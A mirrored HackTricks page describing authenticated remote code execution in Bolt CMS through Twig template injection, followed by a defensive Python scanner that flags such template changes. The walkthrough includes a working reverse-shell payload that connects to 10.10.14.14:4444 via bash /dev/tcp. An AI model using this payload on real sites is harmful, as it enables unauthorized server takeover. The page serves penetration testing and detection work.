mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
Bolt CMS
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
RCE
After logging in as admin (go to /bolt to access the login prompt), you can get RCE in Bolt CMS:
- Select Configuration -> View Configuration -> Main Configuration, or go to the URL path /bolt/file-edit/config?file=/bolt/config.yaml
- Check the value of theme
- Select File management -> View & edit templates
- Select the theme base found in the previous step (base-2021 in this case) and select index.twig
- In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig
- Set your payload in this file via template injection (Twig), like:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
- And save changes
- Clear the cache in Maintenance -> Clear the cache
- Access the page again as a regular user, and the payload should be executed
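A defensive check for the template change described above, as an added example that is not part of the original page: it scans theme templates for Twig filters that receive a quoted string where an arrow function is expected. It generalizes from filter to Twig's other callable-taking filters (map, sort, reduce); the sample templates, the placeholder command and all function names are constructed for illustration.

```python
import re

# Twig filters that take a callable argument. Normal templates pass an arrow
# function (v => ...); a quoted string here names a PHP function instead.
CALLABLE_FILTERS = ("filter", "map", "sort", "reduce")
STRING_CALLABLE = re.compile(
    r"\|\s*(?P<filter>" + "|".join(CALLABLE_FILTERS) + r")\s*\(\s*"
    r"(?P<quote>['\"])(?P<name>[^'\"]*)(?P=quote)"
)

def scan_template(path, text):
    """Return (path, line_no, filter, callable_name) for each suspicious use."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in STRING_CALLABLE.finditer(line):
            findings.append((path, line_no, m.group("filter"), m.group("name")))
    return findings

def scan_theme(templates):
    """Scan a {path: template_text} mapping, e.g. read from a themes directory."""
    findings = []
    for path, text in sorted(templates.items()):
        findings.extend(scan_template(path, text))
    return findings

# Constructed sample input: a clean template, and one modified in the way this
# page describes (the command string is replaced by a harmless placeholder).
SAMPLE_TEMPLATES = {
    "base-2021/record.twig": (
        "<ul>\n"
        "{% for item in items|filter(v => v.published) %}\n"
        "  <li>{{ item.title|upper }}</li>\n"
        "{% endfor %}\n"
        "</ul>\n"
    ),
    "base-2021/index.twig": (
        "<h1>{{ site.title }}</h1>\n"
        "{{['PLACEHOLDER_COMMAND']|filter('system')}}\n"
    ),
}

if __name__ == "__main__":
    for path, line_no, flt, name in scan_theme(SAMPLE_TEMPLATES):
        print(f"{path}:{line_no}: |{flt}('{name}') passes a string as a callable")
```

Running this against the theme directory after every admin template edit, or diffing templates against a known-good copy, surfaces the change before the cache is cleared and the page is served.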